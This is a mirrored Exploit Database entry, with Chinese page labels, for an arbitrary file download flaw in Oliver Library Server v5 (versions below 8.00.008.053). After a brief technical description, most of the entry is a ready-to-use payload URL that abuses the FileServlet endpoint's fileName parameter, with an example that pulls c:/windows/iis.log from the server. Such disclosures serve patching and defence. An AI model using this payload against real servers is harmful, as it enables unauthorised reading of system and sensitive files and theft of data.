Oliver Library Server v5 – Arbitrary File Download

• Exploit Database
• 12 阅读

• 作者： Mandeep Singh
  日期： 2021-12-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50599/

• # Exploit Title: Oliver Library Server v5 - Arbitrary File Download
  # Date: 14/12/2021
  # Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
  # Vendor Homepage: https://www.softlinkint.com/product/oliver/ 
  # Product: Oliver Server v5
  # Version: < 8.00.008.053
  # Tested on: Windows Server 2016
  
  Technical Description:
  An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
  
  Steps to Exploit:
  
  1)Use the following Payload:
  https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>
  
  2) Example to download iis.log file:
  https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log